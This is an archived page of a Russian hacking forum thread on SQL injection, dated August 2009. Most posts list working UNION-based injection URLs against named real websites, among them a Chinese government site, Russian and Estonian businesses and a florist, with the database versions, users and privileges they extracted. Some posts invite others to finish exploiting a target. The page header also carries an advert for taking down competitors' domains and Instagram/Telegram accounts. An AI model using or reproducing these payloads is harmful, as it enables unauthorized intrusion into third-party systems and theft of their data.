УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 1044 из 1242

1044

Опции темы

Поиск в этой теме

Опции просмотра

#10431

15.08.2009, 20:08

rushter

Reservists Of Antichat - Level 6

Регистрация: 23.05.2008

Сообщений: 756

Провел на форуме:
9257858

Репутация: 979

Отправить сообщение для rushter с помощью ICQ

http://www.hankookfa.com/view.php?num=-418+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9/*
pr2

#10432

15.08.2009, 20:19

~~Swift~~

Banned

Регистрация: 27.10.2008

Сообщений: 78

Провел на форуме:
174909

Репутация: 454

http://www.ipcc.cma.gov.cn/Website/index.php?WCHID=30+UNION+SELECT+AES_DECRYPT(AES_EN CRYPT(CONCAT(0x3a,version(),user(),database()),0x7 1),0x71),2,3,4/*

5.0.18root@localhostipcc_cma_gov_cn

#10433

16.08.2009, 00:18

ILYAtirtir

Участник форума

Регистрация: 25.04.2007

Сообщений: 176

Провел на форуме:
1957988

Репутация: 739

Отправить сообщение для ILYAtirtir с помощью ICQ

Razzie Awards(Официальный сайт премии «Золотая малина»)

MS Access

Цитата:

http://razzies.com/asp/directory/XcDirViewRatings.asp?LinkID=1193+union+select+null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null+from+????

Скуля есть,но какие там таблицы хз. Знаю что стоит XcNewsPlus,так же есть web wiz forum,но его таблицы в другой базе,так что тоже надо подбирать.Если кто сможет,раскрутите)

#10434

16.08.2009, 03:17

nemaniak

Участник форума

Регистрация: 10.06.2008

Сообщений: 201

Провел на форуме:
1174919

Репутация: 229

PR3

Код:

http://www.sgb-cisl.it/sites/wir_gremiumdetails.php?lang=de&id_gremienkategorie=-1+and+1=1+UNION+SELECT+concat_ws(0x3a,version(),user(),database())

5.0.45-log:sgbcisl@localhost:sgbcisl

#10435

16.08.2009, 12:56

mol0t

Познающий

Регистрация: 08.07.2009

Сообщений: 43

Провел на форуме:
1369392

Репутация: 262

Код:

http://www.unitedland.ru/news.php?id=-6+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4--

caption_land:5.0.81-community:caption_merk@localhost

Код:

http://www.elios-nsk.ru/prod_info.php?id=-9640+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4,5,6,7,8,9,10,11,12,13--

inetsruq_elios:5.0.81-community-log:inetsruq_elios@localhost

#10436

16.08.2009, 16:27

BHYCHIK

Познающий

Регистрация: 30.01.2009

Сообщений: 64

Провел на форуме:
550208

Репутация: 94

http://www.birgitta.ee/2008/index.php?page=news&id=2+and+0+union+select+1,2,3--+

http://www.birgitta.ee/2008/index.php?page=news&id=2+and+0+union+select+1,2,co ncat_ws(0x3a,user(),version(),database(),@@version _compile_os)--+

User:dart@localhost
database:dartklient
version:5.0.58-log
OS:redhat-linux-gnu
доступ к mysql.user: нет
file_priv: нет

#10437

16.08.2009, 19:49

Noizless

Новичок

Регистрация: 26.07.2009

Сообщений: 6

Провел на форуме:
35784

Репутация: 18

Код:

http://www.tan-jurist.ru/articles.php?id=-7+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10--

Database Version: 5.0.67-log
Database name: u25507
User name: u25507@10.10.223.201

#10438

16.08.2009, 20:18

BHYCHIK

Познающий

Регистрация: 30.01.2009

Сообщений: 64

Провел на форуме:
550208

Репутация: 94

http://www.uvic.ee/prodfull.php?id=-109+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15

Database(): d1894sd5697
User(): d1894sa9657@z135.zone.ee
Version(): 5.1.35
OS: unknown-linux-gnu
File_priv: Нет
Доступ к mysql.user: Нет

Интересные таблицы не нашел. Доступ к админке ограничен через .htaccess
http://www.uvic.ee/admin

#10439

16.08.2009, 20:22

Assembler

Участник форума

Регистрация: 01.09.2007

Сообщений: 203

Провел на форуме:
812964

Репутация: 302

Отправить сообщение для Assembler с помощью ICQ

http://www.ru-host.ru/next.php?id=3-3%20union%20select%201,group_concat(column_name)%2 0from%20information_schema.columns%20where%20table _name=0x686f73745f6e657773--

Хостер =) 5 версия...

Джокестар, если боян минус не ставь... Антибоян не работает временно

#10440

16.08.2009, 20:26

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

Код:

http://www.subco.org/sc.php?src=entry&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13/*

Код:

subco@localhost:subco:5.0.45

Код:

http://www.norvellgroup.com/property-offered-charleston-sc.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5

Код:

norvell_cms@localhost:norvell_cms:4.1.22-standard-log

Код:

http://209.172.57.37:8080/smsmanager/smsuser/welcome.jsp?np=addressbook&v=2&KEYID=-1+union+select+1,2,3,4,5,6

Код:

http://www.clontarfflorist.com/shopping/sc.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5

Код:

clonta1_doug@web9.hosting365.ie:clonta1_SHOP:5.0.45-community-log

Последний раз редактировалось mailbrush; 16.08.2009 в 20:30.. Причина: один боянчик :)

Страница 1044 из 1242

1044

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 9 (пользователей: 0 , гостей: 9)

Быстрый переход